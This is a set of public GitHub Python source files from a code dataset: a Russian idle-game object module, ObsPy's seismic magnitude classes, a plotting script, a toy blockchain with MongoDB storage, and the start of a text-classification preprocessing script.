'limit': 100, 'bps': 5, 'draw_col': 2},\n ]\n self.button_dict = [\n {\n 'name': 'LEVEL',\n 'action': self.lvl,\n 'item': self,\n },\n {\n 'name': 'GRAB',\n 'action': self.GrabBums,\n 'item': self,\n },\n ]\n self.button_dict_limited = [\n {\n 'name': 'GRAB',\n 'action': self.GrabBums,\n 'item': self,\n },\n ]\n self.text_dict = {\n 'info_screen': {\n 'body': {\n 'alignment': 'left',\n 'text': ['Уровень: ', 'Бомжи: ', 'Предел бомжей: ']\n },\n 'body_val': {\n 'alignment': 'right',\n 'attr': ['lvl', 'bums', 'limit']\n }\n },\n 'info_annotation': {\n 'header': {\n 'alignment': 'center',\n 'text': 'Остановка'\n },\n 'text': {\n 'alignment': 'left',\n 'text': ['Место респауна бомжей. 
Прибывают до тех пор, пока не закончится место.']\n },\n },\n 'shop_annotation': {\n 'text': {\n 'alignment': 'left',\n 'text': ['Обычная такая автобусная остановка в трущобах, на которой любят скапливаться бомжи и обблёвывать всё вокруг.']\n },\n },\n }\n '''\n self.info_screen = [\n {'display_name': 'Уровень: ',\n 'attr': 'lvl'},\n {'display_name': 'Бомжи: ',\n 'attr': 'bums'},\n {'display_name': 'Предел бомжей: ',\n 'attr': 'limit'},\n ]'''\n\n def tile_to_default(self):\n self.tile = [\n [1, 1, 1],\n [1, 1, 1],\n [0, 0, 0]\n ]\n self.pivot = [1,1]\n\n def SetNewID(self, item_id):\n self.objects_dict[item_id].update(self.lvl_list[0])\n if self not in self.user.property_list['EUR']:\n self.user.property_list['EUR'].append(self)\n\n def GrabBums(self, item_state):\n item_id = item_state['item_id']\n self.user.resources['bums'] += self.objects_dict[item_id]['bums']\n self.objects_dict[item_id]['bums'] = 0\n\n def lvl(self, item_state):\n new_lvl = self.objects_dict[item_state['item_id']]['lvl']\n self.objects_dict[item_state['item_id']].update(self.lvl_list[new_lvl])\n\n #Проходится по всем своим объектам, считает прибыль\n def resources_update(self):\n for ID in self.objects_dict:\n #По бомжам\n if self.objects_dict[ID]['bums'] < (self.objects_dict[ID]['limit'] - self.objects_dict[ID]['bum_cash'] - self.objects_dict[ID]['bps']):\n self.objects_dict[ID]['bum_cash'] += self.objects_dict[ID]['bps']\n self.objects_dict[ID]['bums'] += int((self.objects_dict[ID]['bum_cash'] // 1))\n self.user.resources['total_bums'] -= int((self.objects_dict[ID]['bum_cash'] // 1))\n self.objects_dict[ID]['bum_cash'] = self.objects_dict[ID]['bum_cash'] % 1\n elif self.objects_dict[ID]['bums'] < self.objects_dict[ID]['limit']:\n self.user.resources['total_bums'] -= int(self.objects_dict[ID]['limit'] - self.objects_dict[ID]['bums'])\n self.objects_dict[ID]['bums'] = self.objects_dict[ID]['limit']\n\n self.objects_dict[ID]['draw_frame'] = 2 + int(self.objects_dict[ID]['bums'] * 5 / self.objects_dict[ID]['limit'])\n\n\n#Потребитель бомжей, майнер денег\nclass ShootingRange():\n def __init__(self, user):\n self.user = user\n self.tile_to_default()\n self.objects_dict = {}\n self.img = None\n self.lvl_list = [\n {'lvl': 1, 'cost': 0, 'bums':0, 'cps': 10, 'bps': 3, 'draw_frame': 2},\n {'lvl': 2, 'cost': 100, 'cps': 50, 'bps': 1},\n {'lvl': 3, 'cost': 1000, 'cps': 100, 'bps': 5},\n ]\n self.button_dict = [\n {\n 'name': 'LEVEL',\n 'action': self.lvl,\n 'item': self,\n }\n ]\n self.button_dict_limited = []\n self.info_screen = [\n {'display_name': 'Уровень: ',\n 'attr': 'lvl'},\n {'display_name': 'Прибыль: ',\n 'attr': 'cps'},\n ]\n\n self.text_dict = {\n 'info_screen': {\n 'body': {\n 'alignment': 'left',\n 'text': ['Уровень: ', 'Прибыль: ']\n },\n 'body_val': {\n 'alignment': 'right',\n 'attr': ['lvl', 'cps']\n }\n },\n 'info_annotation': {\n 'header': {\n 'alignment': 'center',\n 'text': 'Бомжетир'\n },\n 'text': {\n 'alignment': 'left',\n 'text': ['Место потребления бомжей. Производим деньги, уменьшаем запас бомжей']\n },\n },\n 'shop_annotation': {\n 'text': {\n 'alignment': 'left',\n 'text': ['Короче, здесь запускаем в лес бомжей, а олигархи их отстреливают. 
Бомжей - меньше, олигархи - счатсливы и дают денег.']\n },\n },\n }\n\n def tile_to_default(self):\n self.tile = [\n [1, 1, 1],\n [0, 1, 1],\n [0, 0, 1]\n ]\n self.pivot = [1,1]\n\n def SetNewID(self, item_id):\n self.objects_dict[item_id].update(self.lvl_list[0])\n if self not in self.user.property_list['EUR']:\n self.user.property_list['EUR'].append(self)\n\n def lvl(self, item_state):\n new_lvl = self.objects_dict[item_state['item_id']]['lvl']\n self.objects_dict[item_state['item_id']].update(self.lvl_list[new_lvl])\n\n #Проходится по всем своим объектам, считает прибыль\n def resources_update(self):\n for ID in self.objects_dict:\n #По бомжам\n if self.user.resources['bums'] >= self.objects_dict[ID]['bps']:\n self.user.resources['coins'] += self.objects_dict[ID]['cps']\n self.user.resources['bums'] -= self.objects_dict[ID]['bps']\n\n #Сдвиг кадра в зависимости от наполнения\n self.objects_dict[ID]['draw_frame'] = 5\n\n else:\n self.objects_dict[ID]['draw_frame'] = 2\n\n\n\n\nclass Bum():\n #Все существующие бомжи#\n def __init__(self):\n self.cost = 10 #Цена одного бомжа\n self.amount = 0 #Количество свободных бомжей\n self.efficiency = 1 #Эффективность бомжей\n self.trash = 0 #Счётчик отработанных бомжей\n def buy(self):\n self.amount += 1\n def set(self):\n self.amount -= 1\n\nclass Coins():\n #Деньги игрока\n def __init__(self):\n self.amount = 20\n def income(self, sum): #Прибыль\n self.amount += sum\n def outgo(self, sum): #Расход\n self.amount -= sum\n\n#Игровой процесс пользователя\nclass User():\n def __init__(self):\n self.population = 7444443881\n self.resources = {\n 'total_bums': self.population,\n 'coins': 0,\n 'reputation': 0,\n 'bums': 0,\n 'text_list': ['coins', 'bums', 'reputation', 'total_bums'],\n }\n\n self.sum_coins = 0\n self.sum_bums_news_step = 10\n self.sum_coins_news_step = 10\n\n self.property_list = {\n 'EUR': [],\n }\n\n self.text_dict = {\n 'res_annotation': {\n 'text': {\n 'alignment': 'left',\n 'text': []\n },\n },\n }\n\n self.texts = {\n 'coins': ['Собственно, честно заработанные деньги. Можно тратить ни на что. Они просто есть. А у бомжей нет. Ха-ха.'],\n 'bums': ['Это ваши честно заработанные бомжи. Можете распоряжаться ими, как обычными игровыми ресурсами. Вот типа есть мясо-золото-дерево, а это - бомжи.'],\n 'reputation': ['Репутация. Неизвестно, зачем она сейчас нужна. Просто есть, чего бы нет. Пусть и нулевая.'],\n 'total_bums': ['Население планеты, не являющееся бомжами. Задача - сделать бомжами всех. 
Для этого нужно много водки и автобусных остановок.'],\n }\n\n def get_news(self, news_obj):\n if self.population - self.resources['total_bums'] > self.sum_bums_news_step:\n news_obj.add_jobs('event2')\n #self.Worker.interface_state['news_event'] = 'event2'\n self.sum_bums_news_step += 50\n if self.sum_coins > self.sum_coins_news_step:\n #self.Worker.interface_state['news_event'] = 'event1'\n news_obj.add_jobs('event1')\n self.sum_coins_news_step += 50\n\n#Просит все свои объекты посчитать поступления\n def resources_update(self):\n for country in self.property_list:\n for obj in self.property_list[country]:\n obj.resources_update()\n","repo_name":"apogudin/BumFarm","sub_path":"Objects.py","file_name":"Objects.py","file_ext":"py","file_size_in_byte":10923,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"71880191981","text":"from obspy import UTCDateTime\nfrom obspy.core.event.base import (\n _event_type_class_factory, CreationInfo,\n WaveformStreamID, TimeWindow)\nfrom obspy.core.event import ResourceIdentifier\nfrom obspy.core.event.header import (\n AmplitudeCategory, AmplitudeUnit, EvaluationMode, EvaluationStatus,\n ATTRIBUTE_HAS_ERRORS)\n\n\n__Magnitude = _event_type_class_factory(\n \"__Magnitude\",\n class_attributes=[(\"resource_id\", ResourceIdentifier),\n (\"mag\", float, ATTRIBUTE_HAS_ERRORS),\n (\"magnitude_type\", str),\n (\"origin_id\", ResourceIdentifier),\n (\"method_id\", ResourceIdentifier),\n (\"station_count\", int),\n (\"azimuthal_gap\", float),\n (\"evaluation_mode\", EvaluationMode),\n (\"evaluation_status\", EvaluationStatus),\n (\"creation_info\", CreationInfo)],\n class_contains=[\"comments\", \"station_magnitude_contributions\"])\n\n\nclass Magnitude(__Magnitude):\n \"\"\"\n Describes a magnitude which can, but does not need to be associated with an\n origin.\n\n Association with an origin is expressed with the optional attribute\n originID. It is either a combination of different magnitude estimations, or\n it represents the reported magnitude for the given event.\n\n :type resource_id: :class:`~obspy.core.event.resourceid.ResourceIdentifier`\n :param resource_id: Resource identifier of Magnitude.\n :type force_resource_id: bool, optional\n :param force_resource_id: If set to False, the automatic initialization of\n `resource_id` attribute in case it is not specified will be skipped.\n :type mag: float\n :param mag: Resulting magnitude value from combining values of type\n :class:`~obspy.core.event.magnitude.StationMagnitude`.\n If no estimations are available, this value can represent the\n reported magnitude.\n :type mag_errors: :class:`~obspy.core.event.base.QuantityError`\n :param mag_errors: AttribDict containing error quantities.\n :type magnitude_type: str, optional\n :param magnitude_type: Describes the type of magnitude. This is a free-text\n field because it is impossible to cover all existing magnitude type\n designations with an enumeration. 
Possible values are:\n\n * unspecified magnitude (``'M'``),\n * local magnitude (``'ML'``),\n * body wave magnitude (``'Mb'``),\n * surface wave magnitude (``'MS'``),\n * moment magnitude (``'Mw'``),\n * duration magnitude (``'Md'``)\n * coda magnitude (``'Mc'``)\n * ``'MH'``, ``'Mwp'``, ``'M50'``, ``'M100'``, etc.\n\n :type origin_id: :class:`~obspy.core.event.resourceid.ResourceIdentifier`,\n optional\n :param origin_id: Reference to an origin’s resource_id if the magnitude has\n an associated Origin.\n :type method_id: :class:`~obspy.core.event.resourceid.ResourceIdentifier`,\n optional\n :param method_id: Identifies the method of magnitude estimation. Users\n should avoid to give contradictory information in method_id and\n magnitude_type.\n :type station_count: int, optional\n :param station_count: Number of used stations for this magnitude\n computation.\n :type azimuthal_gap: float, optional\n :param azimuthal_gap: Azimuthal gap for this magnitude computation.\n Unit: deg\n :type evaluation_mode: str, optional\n :param evaluation_mode: Evaluation mode of Magnitude.\n See :class:`~obspy.core.event.header.EvaluationMode` for allowed\n values.\n :type evaluation_status: str, optional\n :param evaluation_status: Evaluation status of Magnitude.\n See :class:`~obspy.core.event.header.EvaluationStatus` for allowed\n values.\n :type comments: list of :class:`~obspy.core.event.base.Comment`, optional\n :param comments: Additional comments.\n :type station_magnitude_contributions: list of\n :class:`~obspy.core.event.magnitude.StationMagnitudeContribution`.\n :param station_magnitude_contributions: StationMagnitudeContribution\n instances associated with the Magnitude.\n :type creation_info: :class:`~obspy.core.event.base.CreationInfo`, optional\n :param creation_info: Creation information used to describe author,\n version, and creation time.\n\n .. 
note::\n\n For handling additional information not covered by the QuakeML\n standard and how to output it to QuakeML see the\n :ref:`ObsPy Tutorial `.\n \"\"\"\n\n\n__StationMagnitude = _event_type_class_factory(\n \"__StationMagnitude\",\n class_attributes=[(\"resource_id\", ResourceIdentifier),\n (\"origin_id\", ResourceIdentifier),\n (\"mag\", float, ATTRIBUTE_HAS_ERRORS),\n (\"station_magnitude_type\", str),\n (\"amplitude_id\", ResourceIdentifier),\n (\"method_id\", ResourceIdentifier),\n (\"waveform_id\", WaveformStreamID),\n (\"creation_info\", CreationInfo)],\n class_contains=[\"comments\"])\n\n\nclass StationMagnitude(__StationMagnitude):\n \"\"\"\n This class describes the magnitude derived from a single waveform stream.\n\n :type resource_id:\n :class:`~obspy.core.event.resourceid.ResourceIdentifier`\n :param resource_id: Resource identifier of StationMagnitude.\n :type force_resource_id: bool, optional\n :param force_resource_id: If set to False, the automatic initialization of\n `resource_id` attribute in case it is not specified will be skipped.\n :type origin_id: :class:`~obspy.core.event.resourceid.ResourceIdentifier`\n :param origin_id: Reference to an origin’s ``resource_id`` if the\n StationMagnitude has an associated\n :class:`~obspy.core.event.origin.Origin`.\n :type mag: float\n :param mag: Estimated magnitude.\n :type mag_errors: :class:`~obspy.core.event.base.QuantityError`\n :param mag_errors: AttribDict containing error quantities.\n :type station_magnitude_type: str, optional\n :param station_magnitude_type: See\n :class:`~obspy.core.event.magnitude.Magnitude`\n :type amplitude_id:\n :class:`~obspy.core.event.resourceid.ResourceIdentifier`\n :param amplitude_id: Identifies the data source of the StationMagnitude.\n For magnitudes derived from amplitudes in waveforms (e.g., local\n magnitude ML), amplitudeID points to publicID in class Amplitude.\n :type method_id: :class:`~obspy.core.event.resourceid.ResourceIdentifier`\n :param method_id: See :class:`~obspy.core.event.magnitude.Magnitude`\n :type waveform_id: :class:`~obspy.core.event.base.WaveformStreamID`,\n optional\n :param waveform_id: Identifies the waveform stream. This element can be\n helpful if no amplitude is referenced, or the amplitude is not\n available in the context. Otherwise, it would duplicate the waveform_id\n provided there and can be omitted.\n :type comments: list of :class:`~obspy.core.event.base.Comment`, optional\n :param comments: Additional comments.\n :type creation_info: :class:`~obspy.core.event.base.CreationInfo`, optional\n :param creation_info: Creation information used to describe author,\n version, and creation time.\n\n .. 
note::\n\n For handling additional information not covered by the QuakeML\n standard and how to output it to QuakeML see the\n :ref:`ObsPy Tutorial `.\n \"\"\"\n\n\n__StationMagnitudeContribution = _event_type_class_factory(\n \"__StationMagnitudeContribution\",\n class_attributes=[(\"station_magnitude_id\", ResourceIdentifier),\n (\"residual\", float),\n (\"weight\", float)])\n\n\nclass StationMagnitudeContribution(__StationMagnitudeContribution):\n \"\"\"\n This class describes the weighting of magnitude values from several\n StationMagnitude objects for computing a network magnitude estimation.\n\n :type station_magnitude_id:\n :class:`~obspy.core.event.resourceid.ResourceIdentifier`\n :param station_magnitude_id: Refers to the resource_id of a\n StationMagnitude object.\n :type residual: float, optional\n :param residual: Residual of magnitude computation.\n :type weight: float, optional\n :param weight: Weight of the magnitude value from class StationMagnitude\n for computing the magnitude value in class Magnitude. Note that there\n is no rule for the sum of the weights of all station magnitude\n contributions to a specific network magnitude. In particular, the\n weights are not required to sum up to unity.\n\n .. note::\n\n For handling additional information not covered by the QuakeML\n standard and how to output it to QuakeML see the\n :ref:`ObsPy Tutorial `.\n \"\"\"\n\n\n__Amplitude = _event_type_class_factory(\n \"__Amplitude\",\n class_attributes=[(\"resource_id\", ResourceIdentifier),\n (\"generic_amplitude\", float, ATTRIBUTE_HAS_ERRORS),\n (\"type\", str),\n (\"category\", AmplitudeCategory),\n (\"unit\", AmplitudeUnit),\n (\"method_id\", ResourceIdentifier),\n (\"period\", float, ATTRIBUTE_HAS_ERRORS),\n (\"snr\", float),\n (\"time_window\", TimeWindow),\n (\"pick_id\", ResourceIdentifier),\n (\"waveform_id\", WaveformStreamID),\n (\"filter_id\", ResourceIdentifier),\n (\"scaling_time\", UTCDateTime, ATTRIBUTE_HAS_ERRORS),\n (\"magnitude_hint\", str),\n (\"evaluation_mode\", EvaluationMode),\n (\"evaluation_status\", EvaluationStatus),\n (\"creation_info\", CreationInfo)],\n class_contains=[\"comments\"])\n\n\nclass Amplitude(__Amplitude):\n \"\"\"\n This class represents a quantification of the waveform anomaly, usually a\n single amplitude measurement or a measurement of the visible signal\n duration for duration magnitudes.\n\n :type resource_id: :class:`~obspy.core.event.resourceid.ResourceIdentifier`\n :param resource_id: Resource identifier of Amplitude.\n :type force_resource_id: bool, optional\n :param force_resource_id: If set to False, the automatic initialization of\n `resource_id` attribute in case it is not specified will be skipped.\n :type generic_amplitude: float\n :param generic_amplitude: Measured amplitude value for the given\n waveformID. Note that this attribute can describe different physical\n quantities, depending on the type and category of the amplitude. These\n can be, e.g., displacement, velocity, or a period. If the only\n amplitude information is a period, it has to specified here, not in the\n period attribute. The latter can be used if the amplitude measurement\n contains information on, e.g., displacement and an additional period.\n Since the physical quantity described by this attribute is not fixed,\n the unit of measurement cannot be defined in advance. However, the\n quantity has to be specified in SI base units. The enumeration given in\n attribute unit provides the most likely units that could be needed\n here. 
For clarity, using the optional unit attribute is highly\n encouraged.\n :type generic_amplitude_errors:\n :class:`~obspy.core.event.base.QuantityError`\n :param generic_amplitude_errors: AttribDict containing error quantities.\n :type type: str, optional\n :param type: Describes the type of amplitude using the nomenclature from\n Storchak et al. (2003). Possible values are:\n\n * unspecified amplitude reading (``'A'``),\n * amplitude reading for local magnitude (``'AML'``),\n * amplitude reading for body wave magnitude (``'AMB'``),\n * amplitude reading for surface wave magnitude (``'AMS'``), and\n * time of visible end of record for duration magnitude (``'END'``).\n\n :type category: str, optional\n :param category: Amplitude category. This attribute describes the way the\n waveform trace is evaluated to derive an amplitude value. This can be\n just reading a single value for a given point in time (point), taking a\n mean value over a time interval (mean), integrating the trace over a\n time interval (integral), specifying just a time interval (duration),\n or evaluating a period (period).\n See :class:`~obspy.core.event.header.AmplitudeCategory` for allowed\n values.\n :type unit: str, optional\n :param unit: Amplitude unit. This attribute provides the most likely\n measurement units for the physical quantity described in the\n genericAmplitude attribute. Possible values are specified as\n combinations of SI base units.\n See :class:`~obspy.core.event.header.AmplitudeUnit` for allowed\n values.\n :type method_id: :class:`~obspy.core.event.resourceid.ResourceIdentifier`\n :param method_id: Describes the method of amplitude determination.\n :type period: float, optional\n :param period: Dominant period in the timeWindow in case of amplitude\n measurements. Not used for duration magnitude. Unit: s\n :type snr: float, optional\n :param snr: Signal-to-noise ratio of the spectrogram at the location the\n amplitude was measured.\n :type time_window: :class:`~obspy.core.event.base.TimeWindow`, optional\n :param time_window: Description of the time window used for amplitude\n measurement. Recommended for duration magnitudes.\n :type pick_id: :class:`~obspy.core.event.resourceid.ResourceIdentifier`\n :param pick_id: Refers to the ``resource_id`` of an associated\n :class:`~obspy.core.event.origin.Pick` object.\n :type waveform_id: :class:`~obspy.core.event.base.WaveformStreamID`,\n :param waveform_id: Identifies the waveform stream on which the amplitude\n was measured.\n :type filter_id: :class:`~obspy.core.event.resourceid.ResourceIdentifier`\n :param filter_id: Identifies the filter or filter setup used for filtering\n the waveform stream referenced by ``waveform_id``.\n :type scaling_time: :class:`~obspy.core.utcdatetime.UTCDateTime`, optional\n :param scaling_time: Scaling time for amplitude measurement.\n :type scaling_time_errors: :class:`~obspy.core.event.base.QuantityError`\n :param scaling_time_errors: AttribDict containing error quantities.\n :type magnitude_hint: str, optional\n :param magnitude_hint: Type of magnitude the amplitude measurement is used\n for. This is a free-text field because it is impossible to cover all\n existing magnitude type designations with an enumeration. 
Possible\n values are:\n\n * unspecified magnitude (``'M'``),\n * local magnitude (``'ML'``),\n * body wave magnitude (``'Mb'``),\n * surface wave magnitude (``'MS'``),\n * moment magnitude (``'Mw'``),\n * duration magnitude (``'Md'``)\n * coda magnitude (``'Mc'``)\n * ``'MH'``, ``'Mwp'``, ``'M50'``, ``'M100'``, etc.\n\n :type evaluation_mode: str, optional\n :param evaluation_mode: Evaluation mode of Amplitude.\n See :class:`~obspy.core.event.header.EvaluationMode` for allowed\n values.\n :type evaluation_status: str, optional\n :param evaluation_status: Evaluation status of Amplitude.\n See :class:`~obspy.core.event.header.EvaluationStatus` for allowed\n values.\n :type comments: list of :class:`~obspy.core.event.base.Comment`, optional\n :param comments: Additional comments.\n :type creation_info: :class:`~obspy.core.event.base.CreationInfo`, optional\n :param creation_info: CreationInfo for the Amplitude object.\n\n .. note::\n\n For handling additional information not covered by the QuakeML\n standard and how to output it to QuakeML see the\n :ref:`ObsPy Tutorial `.\n \"\"\"\n\n\nif __name__ == '__main__':\n import doctest\n doctest.testmod(exclude_empty=True)\n","repo_name":"obspy/obspy","sub_path":"obspy/core/event/magnitude.py","file_name":"magnitude.py","file_ext":"py","file_size_in_byte":16152,"program_lang":"python","lang":"en","doc_type":"code","stars":1088,"dataset":"github-code","pt":"92"} +{"seq_id":"43363162846","text":"import json\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.patches as patches\r\nimport numpy as np\r\nimport cv2\r\n\r\n\r\nbasepath = '..\\\\..\\\\image\\\\autotrace\\\\'\r\n\r\ndist_th = 8*10\r\n\r\n\r\nwith open(basepath + 'connect.json', 'r') as f:\r\n tp_info = json.load(f)\r\n\r\nimagedir = basepath + tp_info['reference']['viewed_image']\r\nview_image = cv2.imread(imagedir)\r\n\r\n\r\nexport_filedir = basepath + tp_info['export_filedir']\r\n\r\n\r\n\r\nfor filename, context in tp_info['sample'].items():\r\n data = np.loadtxt(basepath + filename + \".csv\", delimiter = ',')\r\n\r\n plt.figure()\r\n ax = plt.axes()\r\n\r\n plt.title(filename)\r\n plt.scatter(data[:,0], data[:,1])\r\n plt.plot(data[:,0], data[:,1])\r\n for t in data:\r\n ax.add_patch(patches.Rectangle(xy=(t[0]-t[2]/2, t[1]-t[3]/2), width=t[2], height=t[3], fill=False, ec='red'))\r\n\r\n\r\n\r\n plt.imshow(view_image, cmap='gray')\r\n\r\n\r\n plt.show()\r\n\r\n\r\n\r\n\r\n","repo_name":"belre/RubberMatching","sub_path":"src/autotrace/connect_plotter.py","file_name":"connect_plotter.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"28264023469","text":"from datetime import datetime\nimport json\nimport hashlib\nfrom Crypto.PublicKey import RSA\nfrom Crypto.Signature import PKCS1_v1_5 as pkcs1_15\nimport requests\nfrom urllib.parse import urlparse\nfrom pymongo import MongoClient\nimport os\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nMONGODB_URI = os.environ['MONGODB_URI'] if os.environ['MONGODB_URI'] else 'mongodb://127.0.0.1:27017'\n\nTIME = lambda :datetime.now().strftime(\"%d/%m/%Y, %H:%M:%S\")\n\nclass Mongo:\n\n def __init__(self):\n self.client = MongoClient(MONGODB_URI) \n self.db = self.client['blockchain']\n\nclass Blockchain(object):\n \n def __init__(self):\n self.conn = Mongo()\n if [x for x in self.conn.db.blocks.find()] != []:\n self.chain = []\n self.loadMongo()\n else:\n self.chain = self.init__chain()\n self.saveBlockMongo(self.chain[0])\n 
self.pendingTransactions = []\n self.difficulty = 4\n self.minerRewards = 5\n self.blockSize = 20\n\n def __str__(self):\n return \"#\".join(str(block) for block in reversed(self.chain) if self.chain != [])[0:]\n\n def saveBlockMongo(self, block):\n try:\n search = self.conn.db.blocks.find_one({'hash': block.hash})\n if search is None:\n encodedBlock = self.jsonEncodeBlock(block)\n self.conn.db.blocks.insert_one(encodedBlock)\n return True\n except Exception as e:\n return e\n\n def loadMongo(self):\n try:\n chain = self.conn.db.blocks.find()\n for block in chain:\n newBlock = self.jsonDecodeBlock(block)\n self.addBlock(newBlock)\n except Exception as e:\n return e\n\n def jsonDecodeBlock(self, block):\n temp_block = Block([Transaction(block['sender'], block['receiver'], int(block['amount']))], block['time'], block['index'])\n temp_block.hash = block['hash']\n temp_block.previous_hash = block['prevHash']\n return temp_block\n\n def jsonEncodeBlock(self, block):\n JSONblock = {\n 'index': block.index,\n 'hash': block.hash,\n 'prevHash': block.previous_hash,\n 'time': block.time,\n 'sender': block.transactions[0].sender,\n 'receiver': block.transactions[0].receiver,\n 'amount': block.transactions[0].amount\n }\n return JSONblock\n\n def getPendingTransactions(self): \n return \"#\".join(str(transaction) for transaction in self.pendingTransactions)[0:]\n\n def init__chain(self):\n first_block = Block([Transaction('admin', 'Kwstantinos Angelopoulos', 10000)], TIME(), 0)\n first_block.previous_hash = 'None'\n return [first_block]\n\n def getLastBlock(self):\n return self.chain[-1]\n\n def addBlock(self, block):\n if len(self.chain) > 0:\n block.previous_hash = self.getLastBlock().hash\n else:\n block.previous_hash = \"none\"\n self.chain.append(block)\n self.saveBlockMongo(block)\n \n def generate_keys(self):\n key = RSA.generate(2048)\n # private_key = key.export_key()\n # with open('private.pem', 'wb') as private_key_file:\n # private_key_file.write(private_key)\n \n # public_key = key.publickey().export_key()\n # with open('public.pem', 'wb') as public_key_file:\n # public_key_file.write(public_key)\n \n return f\"{key.publickey().export_key().decode('ASCII')}${key.export_key().decode('ASCII')}\"\n \n def get_balance(self, person):\n try:\n balance = 0\n for block in self.chain:\n for transaction in block.transactions:\n if transaction.sender == person:\n balance -= float(transaction.amount)\n if transaction.receiver == person:\n balance += float(transaction.amount)\n return f'{person.title()} balance -> {balance}'\n except Exception as e:\n return e\n\n def isValidChain(self):\n for i in range(1, len(self.chain)):\n prev_block = self.chain[i-1]\n next_block = self.chain[i]\n \n if not next_block.hasValidTransactions() or \\\n next_block.hash != next_block.calculate_hash() or \\\n next_block.previous_hash != prev_block.hash:\n return False\n \n return True\n \n def mineBlock(self, _hash, miner):\n try:\n for transaction in self.pendingTransactions:\n if transaction.hash == _hash:\n newBlock = Block([transaction], TIME(), len(self.chain))\n newBlock.previous_hash = self.getLastBlock().hash\n newBlock.mine(self.difficulty)\n self.addBlock(newBlock)\n self.pendingTransactions = [Transaction(\"Miner Rewards\", miner, self.minerRewards)]\n return 'OK'\n else:\n return 'Error 400!'\n except Exception as e:\n return e\n\n def pendingTransaction(self, miner):\n nPending = len(self.pendingTransactions)\n if nPending <= 1: return False\n else:\n for i in range(0, nPending, self.blockSize):\n end = i + 
self.blockSize\n if i >= nPending: end = nPending\n blockSlice = self.pendingTransactions[i:end]\n newBlock = Block(blockSlice, TIME(), len(self.chain))\n newBlock.previous_hash = self.getLastBlock().hash\n newBlock.mine(self.difficulty)\n self.chain.append(newBlock)\n self.pendingTransactions = [Transaction(\"Miner Rewards\", miner, self.minerRewards)]\n\n def addTransaction(self, sender, receiver, amount, keyString, senderKey):\n keyByte = keyString.encode(\"ASCII\")\n senderKeyByte = senderKey.encode(\"ASCII\")\n key = RSA.import_key(keyByte)\n senderKey = RSA.import_key(senderKeyByte)\n\n if not sender or not receiver or not amount:\n return False\n \n transaction = Transaction(sender, receiver, amount)\n transaction.signTransaction(key, senderKey)\n\n if not transaction.isValidTransaction():\n return False\n\n self.pendingTransactions.append(transaction)\n return len(self.chain) + 1\n \n def conflicts(self):\n try:\n for i in range(len(self.chain)-1):\n if self.chain[i].hash == self.chain[i+1].hash:\n self.chain.pop(i)\n except Exception as e:\n return e \n\nclass Block(object):\n \n def __init__(self, transactions, time, index):\n self.transactions = transactions\n self.previous_hash = ''\n self.time = time\n self.index = index\n self.nonse = 0\n self.hash = self.calculate_hash()\n\n def __str__(self):\n return f\"{self.index}%{self.hash}%{self.previous_hash}%{self.time}%{self.transactions[0].sender}%{self.transactions[0].receiver}%{self.transactions[0].amount}\"\n\n def calculate_hash(self):\n hashTransactions = \"\"\n\n for transaction in self.transactions:\n hashTransactions += transaction.hash\n \n hashString = str(self.time) + hashTransactions + self.previous_hash + str(self.nonse)\n hashEncoded = json.dumps(hashString, sort_keys=True).encode()\n return hashlib.sha256(hashEncoded).hexdigest()\n \n def hasValidTransactions(self):\n for transaction in self.transactions:\n if not transaction.isValidTransaction():\n return False\n return True\n\n def mine(self, difficulty):\n hashMatch = ''.join([str(i) for i in range(difficulty)])\n \n while self.hash[:difficulty] != hashMatch:\n self.nonse += 1\n self.hash = self.calculate_hash()\n return True\n\n\nclass Transaction(object):\n \n def __init__(self, sender, receiver, amount):\n self.sender = sender\n self.receiver = receiver\n self.amount = amount\n self.time = TIME()\n self.hash = self.calculate_hash()\n self.signature = \"\"\n self.validation = ''\n\n def __str__(self):\n return f\"{self.sender}%{self.receiver}%{self.amount}%{self.time}%{self.hash}%{self.validation}\"\n\n def calculate_hash(self):\n hashString = self.sender + self.receiver + str(self.amount) + str(self.time)\n hashEncoded = json.dumps(hashString, sort_keys=True).encode()\n return hashlib.sha256(hashEncoded).hexdigest()\n\n def isValidTransaction(self):\n if self.hash != self.calculate_hash() or self.sender == self.receiver or \\\n not self.sender or len(self.signature) == 0:\n self.validation = '❌'\n return False\n if self.sender == \"Miner rewards\": \n self.validation = '✔'\n return True\n self.validation = '✔'\n return True\n \n def signTransaction(self, key, senderKey):\n if (self.hash != self.calculate_hash()):\n return False\n if str(key.publickey().export_key()) != str(senderKey.publickey().export_key()):\n return False\n pkcs1_15.new(key)\n self.signature = \"made\"\n return True\n\n\nif __name__ == \"__main__\":\n bchain = Blockchain()\n block = Block([Transaction(\"me\", \"admin\", 100)], TIME(), 1)\n bchain.addBlock(block)\n block = 
Block([Transaction(\"me\", \"admin\", 1000)], TIME(), 2)\n bchain.addBlock(block)\n block = Block([Transaction(\"admin\", \"me\", 100)], TIME(), 3)\n bchain.addBlock(block)\n print(bchain)\n print(bchain.get_balance(\"admin\"))\n print(bchain.chain[0].mine(4))\n","repo_name":"KonstantinosAng/blockchain-coin","sub_path":"src/backend/blockchain.py","file_name":"blockchain.py","file_ext":"py","file_size_in_byte":8731,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"10123263330","text":"import numpy as np\n\ndoc_word_mapper = {}\nl_list = []\nindex_dict = {}\nfreq_dict = {}\n\nword_class_mapper = {} # [word, class]: count\nlabel_count_mapper = np.zeros(20)\nclass_docs = {}\ntrain_y = []\n\nwith open('matlab/test.label', 'r') as fp:\n for line in fp:\n label = int(line.strip())\n # its good to point out that doc_id 'n' will have label at 'n-1'th place\n # in simple words doc0 will have label at train_y[0] which will be between 1-20\n train_y.append(label)\n class_docs[label] = class_docs.get(label, 0)\n\ni = 0\nwith open('matlab/test.data', 'r') as fp:\n for line in fp:\n doc_id, word_id, count = line.strip().split(' ')\n if word_id not in l_list:\n index_dict[word_id] = i\n i = i + 1\n l_list.append(word_id)\n\nclass_vector = np.zeros((20, len(l_list)))\nclass_count = np.zeros(20)\n\nprevious_doc = 1\nwith open('matlab/test.data', 'r') as fp:\n temp = np.zeros(len(l_list))\n total_count = 0\n for line in fp:\n doc_id, word_id, count = line.strip().split(' ')\n doc_id = int(doc_id)\n if previous_doc != doc_id:\n class_vector[train_y[int(previous_doc)]-1, :] += (temp/total_count)\n 